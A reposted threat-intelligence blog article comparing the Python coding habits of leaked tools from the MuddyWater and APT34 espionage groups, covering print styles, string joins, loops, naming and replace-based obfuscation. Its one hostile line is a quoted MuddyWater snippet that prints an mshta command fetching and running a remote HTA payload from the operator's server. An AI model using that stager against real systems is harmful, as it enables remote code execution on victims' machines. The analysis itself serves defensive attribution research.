Similarities and differences between MuddyWater and APT34

#ransomware #hacked

Security expert Marco Ramilli analyzed similarities and differences between the MuddyWater and APT34 groups.

Many state sponsored groups have been identified over time, many of them have different names (since discovered by different organizations) and there is no an agreed standardization on the topic but many victims and some interests look very tight together. From here the idea to compare the leaked source code of two different state sponsored cyber-espionage groups, looking for similarities and for differences in coding style rather than on functionalities.

While I analyzed several APT34 samples ( some of my public analyses are available here,here and here) it’s the first time I take a closer look to MuddyWater artifacts. Currently available here the MuddyWater leaked tools are written in Python and implement neat functionalities for automate infection chains.

The MuddyWater attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “POWERSTATS”. Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques.

MISP-TI

Today I’d like to look for strong and weak similarities between ATP34 and MuddyWater, I wont reach any conclusions so far, so I am not getting into the topic “they are the same group” or “they actually live in the same building” or again “they did not belong to the same matrix” or whatever topic related to such, but I think there are some similarities (mostly weak) and quite evident differences (again weak differences) in the way they code in Python. I am aware that the following practices are not overwhelming evidences, but you might agree with me that developers spend years in defining the best and the most beautiful way to implement their code. It would be difficult to code with “someone else style” by changing their coding habitat.

The sources I am going to compare are the sources belonging to the “last leaked” MuddyC3 and to the “previously leaked” WebMask. Everything is freely available online for further checks. The following sections introduce some notes on the observed coding styles and try to motivate them.

Print behavior

The sources show differences in the printing function. MuddyWater implements a more “fancy” printing function by adding the symbol “[+]” when things go in the right direction and by adding the symbol “[-]” when flows hit errors or some unwanted conditions. Moreover MuddyWater uses color in outputs by implementing a core function called colors.py. These amenities are not available in the APT34 sources.

Color.py by MuddyWater

Both of the groups uses single quote for printing string and use the + operator as concatenation string in print functions rather than %s operator. MuddyWater in complex substitution strings uses \n at the beginning of the string and at the very end, while in the APT34 sources is not a common practice. ie.
print "\nmshta http://%s:%s/hta\n"%(config.IP,config.PORT)(is MuddyWater Style). APT34 looks like using the print as a debugger, there are many commented print statements such as: #print 'something'while in MuddyWater it is not a common practice at all (only one occurrence). I would say that the print behavior differ from one to another.

Payload delivery as multi-line string

Both of the analysed groups use the multi-line string for delivery the relative payloads. However the writing style is quite different. For example APT34 uses the “real” multi-line, while MuddyWater abuses the multi-line exploiting its auto-escape indirect proprieties. The following images show what I mean while saying “exploiting the auto-escape” function.

MuddyWater String Multi-Line
APT34 String Multi-Line

MuddyWater delivers its payload in a inline multi-string, avoiding to escape special characters, while APT34 prefers to use the same technique but expanding the payload in order to promote the readability. However both groups frequently use the operator =+ for concatenation and both of them use the ' '.join( to build up objects from empty strings. Interesting to spot a different style inside the MuddyWater package. Indeed in core/webserver.py the developer uses ' '.join( while in core/resa.py the developer used both: ' '.join( and " ".join( (NB the double quote). This is quite wired to me, maybe was more then one developers involved in the developing ?

Code functions and loops

Both groups use a quite clear and identical function nomenclature. While the developer might decide to use many different nomenclatures such as: “CamelMultipleNames”, “Firstcapital”, “lowercase”, “with_underscore”, and so on and so forth, both APT34 and MuddyWater have chosen to go with the “lowercase_with_underscore” mode. If you are thinking to: “Hey, but this is a Python best practice !”, well it is true but it is also true that is not a mandatory choice, moreover the analysed source codes do not implement PEP8/4 at all, so I don’t think developers followed the suggested style guidelines. Again both of groups use a lot the operator for i in range rather than using lists or while loop. Both adopted a nice code protection, in order to avoid unexpected exceptions or un-managed user input which might rise wired behaviours. MuddyWater is well-known for the way they obfuscate powershell payloads. They like to replace function values in order to substitute “obfuscated characters” (ref. replace function dissected by Fireeye) while APT34 used different techniques (such as: Integer encoding, hexadecimal encoding and so forth) however, it’s not hard to find a wide usage of such technique even in the APT34 leaked source code. Actually not in the analyzed python code but rather in the javascript and powershell payload as well belonging to the same package. There we find wide usage of replace functions. The following image shows a crafted internal function called replaceAll (in a javascript code in the APT34 boundle) built to replace strings (or chars) used as a deobfuscation technique.

APT34 Replace function

Summing UP

The following table sums up the similarities and the differences that I found. You might find a - character for every difference and a + character for each similarity. 

The following table sums up the similarities and the differences that I found. You might find a - character for every difference and a + character for each similarity. Again, I am not expressing any personal opinion about the group membership, and I am aware that some of these similarities could be associate to a good code practice but I believe it is still interesting to know that those two groups have their own style similarities.

Parameter MuddyWater APT34 Similarity
printing style [+],[-] No
printing style \n usage Initial and very end No
printing color Yes No
string concatenation =+,+, few time % =+,+, few time % +
comment usage nope significant Yes
Multi-line delivery multi-line “inline” real “multi-line
Join statement wide usage of ' '.join( wide usage of ' '.join( +
loops for i in range for i in range +
function names “underscoring” “underscoring” +
replace statement .replace .replace (not in python code) +

If we consider the first three differences as a single difference since focused on “printing” we might observe 3 differences and 5 similarities.

The original post and other interesting analysis are published on the Marco Ramilli’s blog:

https://marcoramilli.com/2019/06/27/similarities-and-differences-between-muddywater-and-apt34/

via https://www.aiupnow.com

Pierluigi Paganini, Khareem Sudlow

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s